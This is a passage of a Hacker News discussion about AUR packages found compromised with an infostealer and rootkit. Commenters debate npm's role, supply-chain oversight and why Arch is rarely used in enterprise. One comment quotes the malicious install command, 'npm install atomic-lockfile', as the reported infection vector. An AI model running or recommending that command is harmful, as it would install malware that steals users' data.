AUR packages compromised with Infostealer and Rootkit

Posted by keyle 16 hours ago

AUR packages compromised with Infostealer and Rootkit(discourse.ifin.network)

255 points | 186 commentspage 4

QuantumNoodle 11 hours ago|

Man, I never hear good security things about npm

Retr0id 11 hours ago||

This doesn't really have anything to do with npm.

vitamark 10 hours ago|||

anything except that it's malware installed via npm

Retr0id 46 minutes ago||

As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.

https://news.ycombinator.com/item?id=48503258

notabotiswear 10 hours ago|||

From the Arch mailing list [0]

>The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something

[0] https://lists.archlinux.org/archives/list/aur-general@lists....

Retr0id 10 hours ago||

They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue.

notabotiswear 10 hours ago||

Perhaps there were other vectors, but npm was the one used here.

And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate.

animitronix 9 hours ago||

So true. The JavaScript ecosystem is trash.

lenucksi 8 hours ago||

[dead]

lenucksi 8 hours ago||

[flagged]

virajk_31 11 hours ago|

AUR doesn't guarantee security, its upto the user to use AUR & verify before installing anything, its very evident why arch is not used in enterprise solutions.

fooqux 11 hours ago||

It's not the AUR. It's the rolling release cycle, and probably even more importantly, lack of support options.

datakan 10 hours ago|||

The AUR has absolutely nothing to do with the rolling release cycle

virajk_31 9 hours ago||

yes & comment didn't mention that both are dependent, fooqux is correct.

datakan 9 hours ago||

He literally said "It's the rolling release cycle" he is not correct

luxpir 8 hours ago||

You're reading it wrong. He's giving an alternative reason why it's not used in enterprise.

virajk_31 9 hours ago|||

Agree

hootz 11 hours ago||

Arch is not used in enterprise solutions because of the AUR? Can't you just not use it?

virajk_31 9 hours ago||

AUR is choice, rolling release is the reason

this_user 8 hours ago|||

No, it's not. If Debian had a community-maintained repo of additional packages, the same thing could happen there.

The fundamental problem is having something that has very loose oversight and next to no controls. That may have worked in the past, but in the day and age of constant supply chain attacks, it's a major liability.

NekkoDroid 6 hours ago||

GP was talking about why Arch isn't used in enterprise, not what happened in the post.

SahAssar 8 hours ago||||

Rolling release has nothing to do with this. It could just as well be a PPA in ubuntu or any deb repo for debian or similar.

hootz 5 hours ago|||

Makes sense.